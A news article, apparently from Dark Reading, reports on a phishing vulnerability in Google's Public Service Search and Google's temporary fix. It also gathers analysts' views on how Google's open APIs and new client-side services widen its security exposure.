Google has come up with a temporary fix that prevents attackers from exploiting a newly discovered vulnerability in its Public Service Search. The potential exploit lets an attacker place a fake Google sign-in page on Google's actual servers.
Cory Altheide, security manager for Google, said in Google's Webmaster Central blog on Friday that Google has temporarily disabled logins on the service and is working on a permanent fix. So Public Search Service, which is aimed at universities and nonprofits, for now is closed to new signups.
But the glitch is just the latest in a series of security problems that have plagued the search engine firm of late. In the past few months, Google has been the victim of phishing scams on Gmail, toolbar problems, and a trojan that offered Google "updates" but instead made its victims bots. (See Google Toolbar Bug Warns Against Changing Search Engine Default and New Trojan Offers Google Update.) Google's search engine, too, has been abused by would-be attackers searching for vulnerabilities to exploit.
This latest phishing vulnerability, meanwhile, is bolder than most phishing scams because an attacker can place his fake page on the actual Google service and steal usernames and passwords for real Google services. Google's Altheide says in the blog the company knows of no exploits of the vulnerability thus far, "and this service represents an extremely small portion of searches."
So what's causing this wave of security woes at Google? Much of the problem lies in Google's open API model, analysts say. While Google's APIs have helped spread the search engine's popularity, they also leave it open to security weaknesses. "Whenever you have developers being able to create their own search APIs and maps, they can do wacky things," says Charlene Li, an analyst with Forrester Research. "They are a big fat target out there... The APIs make them even more potentially vulnerable."
Richard Stiennon, president of IT-Harvest, agrees. Attackers are deploying Google's APIs, too, he says, as well as using Google to search for potential software vulnerabilities they can exploit. "There's a well-known technique right now where you can search on a security PHP script," for instance.
Google has traditionally had a clean security record, mostly because it mainly provided search capabilities. Now the company is offering client-side, custom search, and email apps, which open it up to security holes: "They had very good security because they were giving you this tiny window into their server pile, and it was extremely well-protected," says Gary McGraw, CTO for Cigital. "The more stuff they stick out there on clients, the more they are going to suffer from this kind of attack."
And that means Google will have to make some big-time changes to its security operations and approach, analysts say.
"As a big application provider, Google should be vigilant when launching new capabilities," Stiennon says.
Google's woes are similar to those of Microsoft in its early days. "Google's concentration is time-to-market, much like Microsoft's was a generation ago," says David Aitel, president of Immunity.
"I think we'll probably see a corresponding security curve at Google, starting with 'What is security?' to 'We should sue these guys' to 'We should hire these guys.' Right now we're in the 'What is security' phase," Aitel says. "Progress along this curve will probably be driven by Google's need to sell into the enterprise market, much like Microsoft's was."
Kelly Jackson Higgins, Senior Editor, Dark Reading